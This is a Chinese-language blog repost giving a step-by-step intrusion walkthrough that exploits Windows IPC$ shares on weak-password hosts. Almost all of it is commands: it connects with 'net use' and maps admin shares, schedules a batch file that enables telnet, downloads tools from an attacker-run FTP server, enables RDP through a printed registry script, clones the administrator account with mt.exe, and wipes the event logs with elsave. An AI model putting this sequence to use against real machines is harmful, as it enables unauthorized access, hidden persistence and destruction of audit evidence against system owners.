當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

IPC***实例

發(fā)布時(shí)間：2025/3/17 编程问答 42 豆豆

生活随笔收集整理的這篇文章主要介紹了 IPC***实例小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

IPC***

第一步：采用X-Scan掃描漏洞主機(jī)，選取開放139/445端口的主機(jī)為***對象，且主機(jī)存在弱口令或者知道主機(jī)的登錄賬戶和密碼。

第二步：建立IPC連接，使用如下命令。

???net??use??\\192.168.10.128\ipc$??"123456"??/user:"administrator"??(當(dāng)用戶名和密碼不包括空格是可以省略"?"。

第三步：可以將主機(jī)的磁盤映射到本地。

?net?use?F:??\\192.168.10.128\C$??注意：遠(yuǎn)程主機(jī)的C盤映射到本地的F盤

?net?use?H:??\\192.168.10.128\admin$??注意：遠(yuǎn)程的windows\system32目錄映射到H盤

?第四步：上傳腳本telnet.bat，開啟telnet服務(wù)。

?????copy??telnet.bat??\\192.168.10..128\admin$?

telnet.bat的內(nèi)容如下：

sc?config?tlntsvr?start=??auto?(start后有空格）

net?strat?"telnet"?

注意：一般情況telent服務(wù)是給禁止的，直接采用net?strat?"telnet"?命令不能啟動(dòng)，要用sc服務(wù)配置命令改變服務(wù)的狀況后才能用net?strat?"telnet"?。

第五步：創(chuàng)建計(jì)劃執(zhí)行telnet.bat腳本。

??????at??\\192.168.10.128?11:00??telnet.bat?

?第六步：用telnet遠(yuǎn)程登錄目標(biāo)主機(jī)。

??????Telnet?192.168.10.128?之后得到輸入用戶名和密碼的命令提示行

?第七步：登錄事先搭建好的ftp服務(wù)器或tftp服務(wù)器，下載開啟3389端口的腳本和管理賬戶克隆工具mt.exe或者AIO和日志清除工具elsave.exe?。

?????????>?ftp

?????????>open?192.16810.129?

?????????>mget?3389.bat??mt?.exe ?elsave.exe ? ?c:\ ?(下載3389.bat、mt.exe、elsave.exe到目標(biāo)主機(jī)的C盤下)

注：3389.bat具體內(nèi)容如下?

@echo off

?echo Windows Registry Editor Version 5.00>>3389.reg?

?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg?

?echo "fDenyTSConnections"=dword:00000000>>3389.reg?

?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg?

?echo "PortNumber"=dword:00000d3d>>3389.reg?

?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg?

?echo "PortNumber"=dword:00000d3d>>3389.reg

?regedit /s 3389.reg?

第八步：執(zhí)行3389.bat腳本和mt.exe

????????mt?-clone??administrator?IUSR_XODU5PTT910NHOO

????????net?user?IUSR_XODU5PTT910NHOO?123456

第九步：克隆成功后，用IUSR_XODU5PTT910NHOO遠(yuǎn)程登錄（mstsc)目標(biāo)主機(jī)。?????

第十步：清除日志。

??????elsave??application??-C

??????elsave??system??-C

??????elsave??security??-C?

環(huán)境：上述事例是在目標(biāo)主機(jī)沒有安裝殺毒軟件，沒有啟用防火墻的情況下。

錯(cuò)誤代碼：

53 ? ?目標(biāo)主機(jī)可能沒有啟用lanmanserver，其顯示名：Server

67 ??自己lanmanworkstation服務(wù)未啟動(dòng)（顯示名：workstation）或者目標(biāo)刪除了IPC$或者是低版本的系統(tǒng)無法向高版本的系統(tǒng)發(fā)起連接，XP無法向server2003發(fā)起連接，server2003無法向server?2008連接，但是高版本的可以向下發(fā)起連接。

1792??網(wǎng)絡(luò)登錄服務(wù)沒有啟動(dòng)，即目標(biāo)的NetLogon服務(wù)未啟動(dòng)。

1326??未知的用戶名或錯(cuò)誤密碼錯(cuò)誤號1326，未知的用戶名或錯(cuò)誤密碼

net?view?\\IP??查看對方開放的共享資源

net?time?\\IP?查看對方的時(shí)間

net?use?c:?/del?刪除映射的c盤，其他盤類推?
net?use?*?/del?/y刪除全部

轉(zhuǎn)載于:https://blog.51cto.com/xttlove/1033899

總結(jié)

以上是生活随笔為你收集整理的IPC***实例的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

实例
IPC

上一篇： Gerchberg–Saxton算法
下一篇： aspnet_regsql在哪里怎么运